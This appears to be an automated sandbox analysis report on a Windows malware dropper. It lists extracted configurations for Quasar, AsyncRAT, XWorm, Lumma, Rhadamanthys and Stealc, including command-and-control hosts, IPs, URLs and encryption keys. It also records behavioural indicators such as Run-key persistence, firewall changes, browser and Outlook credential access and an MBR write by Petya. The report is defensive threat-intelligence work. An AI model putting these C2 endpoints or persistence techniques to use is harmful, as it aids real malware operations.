asyncrat | bd948aeb2b607b34e8d32f22b9e5aee402057adebae4a2e0c70bd666e688f1f8

Resubmissions

14-01-2025 12:40

250114-pwhacaykaz 10

14-01-2025 11:59

250114-n5y4saxngy 10

13-01-2025 14:41

250113-r2dv8avrgs 10

Analysis

max time kernel
769s
max time network
787s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
13-01-2025 14:41

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

192.168.68.104:4782

0.tcp.us-cal-1.ngrok.io:15579

Mutex

93aae856-95a8-4f87-bb5a-e035e00ec571

Attributes

encryption_key
A9BD88FEF9A2EA52A07F5C37D168C315C868BC60
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Antimalware Core Service
subdirectory
SubDir

Extracted

Family

rhadamanthys

https://95.214.55.177:1689/e21adcd5478c6d21f12/jf923j9f.kd10d2

Extracted

Family

asyncrat

Version

| CRACKED BY https://t.me/xworm_v2

Botnet

SolaraFake

anyone-blogging.gl.at.ply.gg:22284

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
Windows.exe
install_folder
%Temp%

aes.plain

Extracted

Family

lumma

https://scriptyprefej.store/api

https://navygenerayk.store/api

https://founpiuer.store/api

https://necklacedmny.store/api

https://thumbystriw.store/api

https://fadehairucw.store/api

https://crisiwarny.store/api

https://presticitpo.store/api

Extracted

Family

quasar

Version

1.4.1

Botnet

main-pc

192.168.100.2:4444

Mutex

979e9520-ec25-48f6-8cd4-516d1007358f

Attributes

encryption_key
6B74F0C858B7E90573D4E97997F2A082B9781250
install_name
main-pc.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Microsoft Service
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

RunTimeBroker

98.51.190.130:20

Mutex

11bbf22e-826e-486b-b024-adbd86228a9e

Attributes

encryption_key
7A589EDBC6A581E125BF830EF0D05FC74BB75E30
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
ctfmon
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

2464c7bf-a165-4397-85fe-def5290750b0

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

xworm

Version

3.1

profile-indians.gl.at.ply.gg:39017

Attributes

Install_directory
%AppData%
install_file
USB.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

RAT 5 (EPIC VERISON)

serveo.net:11453

Mutex

7a1301f7-dc6f-4847-a8ee-ca627a9efa0f

Attributes

encryption_key
3B793156AD6D884F51309D0E992DAA75D03D2783
install_name
Application Frame Host.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Microsoft
subdirectory
SubDir

Extracted

Family

stealc

Botnet

Voov2

http://154.216.17.90

Attributes

url_path
/a48146f6763ef3af.php

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0004000000025cd9-356.dat	family_xworm
behavioral4/memory/5112-378-0x0000000000D70000-0x0000000000D84000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 14 IoCs

resource	yara_rule
behavioral4/files/0x001900000002ab20-35.dat	family_quasar
behavioral4/memory/4508-42-0x0000000000690000-0x00000000009B4000-memory.dmp	family_quasar
behavioral4/files/0x0004000000025be2-173.dat	family_quasar
behavioral4/memory/1476-180-0x0000000000830000-0x0000000000B54000-memory.dmp	family_quasar
behavioral4/files/0x0004000000025c36-191.dat	family_quasar
behavioral4/memory/716-198-0x0000000000C60000-0x0000000000F84000-memory.dmp	family_quasar
behavioral4/files/0x0002000000025ccd-203.dat	family_quasar
behavioral4/memory/4904-210-0x0000000000B90000-0x0000000000EB4000-memory.dmp	family_quasar
behavioral4/files/0x0002000000025ce9-1257.dat	family_quasar
behavioral4/memory/812-1280-0x00000000006C0000-0x00000000009E4000-memory.dmp	family_quasar
behavioral4/memory/3340-1438-0x0000000000CE0000-0x0000000001004000-memory.dmp	family_quasar
behavioral4/files/0x001c00000002ab3a-1492.dat	family_quasar
behavioral4/memory/4836-1516-0x0000000000710000-0x0000000000A34000-memory.dmp	family_quasar
behavioral4/memory/4496-2055-0x0000000000490000-0x00000000007B4000-memory.dmp	family_quasar

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Rhadamanthys family
rhadamanthys
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 2836 created 644	2836	powershell.EXE	5
PID 1460 created 3040	1460	mnftyjkrgjsae.exe	49
PID 2912 created 4012	2912	svchost.exe	190

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/files/0x0005000000025b38-131.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	wudi.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1192	netsh.exe
4920	netsh.exe
1924	netsh.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Executes dropped EXE 51 IoCs

pid	Process
3048	PowerRat.exe
2428	winbox.exe
4508	installer.exe
2196	Client.exe
1228	cabal.exe
4060	update.exe
5016	Loader.exe
3328	Solara_Protect.exe
2016	Windows.exe
1516	ktyhpldea.exe
1476	discord.exe
3604	main-pc.exe
716	vanilla.exe
4904	test.exe
4776	Client.exe
880	wudi.exe
4748	PaoNan.exe
220	system404.exe
1880	test.exe
852	benpolatalemdar.exe
3508	Security.exe
3840	test.exe
5112	$77Security.exe
4508	Install.exe
1660	AnyDesk.exe
1476	AnyDesk.exe
2080	AnyDesk.exe
812	executablelol.exe
5016	$77Security.exe
3340	test.exe
4836	Client-built.exe
3328	mos%20ssssttttt.exe
3304	$77Security.exe
2396	3.exe
2564	3.exe
3304	test.exe
2548	$77Security.exe
1052	Destover.exe
4496	test.exe
1976	donut.exe
1460	mnftyjkrgjsae.exe
4012	gem1.exe
2276	gem1.exe
4984	gem1.exe
1204	gem1.exe
2028	$77Security.exe
3752	whats-new.exe
1948	test.exe
3380	$77Security.exe
1864	daytjhasdawd.exe
2720	Petya.A.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Wine	wudi.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe

Loads dropped DLL 50 IoCs

pid	Process
880	wudi.exe
2080	AnyDesk.exe
1476	AnyDesk.exe
3972	Application Frame Host.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
2564	3.exe
3752	whats-new.exe
3752	whats-new.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe"	$77Security.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "\"C:\\Users\\Admin\\AppData\\Roaming\\SubDir\\Application Frame Host.exe\""	Client-built.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
8	raw.githubusercontent.com
48	raw.githubusercontent.com
49	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
220	api.ipify.org
111	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Petya.A.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\system32\SubDir\main-pc.exe	discord.exe
File opened for modification	C:\Windows\system32\SubDir\main-pc.exe	discord.exe
File opened for modification	C:\Windows\system32\SubDir\main-pc.exe	main-pc.exe
File opened for modification	C:\Windows\System32\Tasks\$77Security	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Windowns Client Startup	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft	svchost.exe
File opened for modification	C:\Windows\system32\SubDir	discord.exe
File opened for modification	C:\Windows\system32\SubDir	main-pc.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3048	PowerRat.exe
1516	ktyhpldea.exe
1516	ktyhpldea.exe
880	wudi.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2836 set thread context of 3260	2836	powershell.EXE	137
PID 4012 set thread context of 4984	4012	gem1.exe	193
PID 4012 set thread context of 1204	4012	gem1.exe	194

UPX packed file 31 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x001b00000002ab1c-26.dat	upx
behavioral4/memory/2428-29-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral4/memory/2428-50-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral4/memory/2428-56-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral4/files/0x0003000000025cd2-245.dat	upx
behavioral4/memory/4748-252-0x0000000001310000-0x000000000131B000-memory.dmp	upx
behavioral4/memory/4748-253-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-265-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-293-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-295-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-291-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-289-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-287-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-283-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-281-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-279-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-275-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-273-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-271-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-269-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-267-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-285-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-263-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-277-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-261-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-259-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-258-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-257-0x0000000000400000-0x0000000000B05000-memory.dmp	upx
behavioral4/memory/4748-256-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-255-0x0000000010000000-0x000000001003E000-memory.dmp	upx
behavioral4/memory/4748-315-0x0000000000400000-0x0000000000B05000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral4/files/0x001a00000002ab40-1747.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1388	4012	WerFault.exe	190

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Destover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ktyhpldea.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cabal.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mos%20ssssttttt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winbox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	system404.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	benpolatalemdar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Solara_Protect.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whats-new.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	daytjhasdawd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dialer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wudi.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PaoNan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mnftyjkrgjsae.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
196	PING.EXE
2548	PING.EXE
3268	PING.EXE
1820	PING.EXE
2032	PING.EXE
1452	PING.EXE

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Driver	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	wmiprvse.exe

Checks processor information in registry 2 TTPs 22 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2456	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
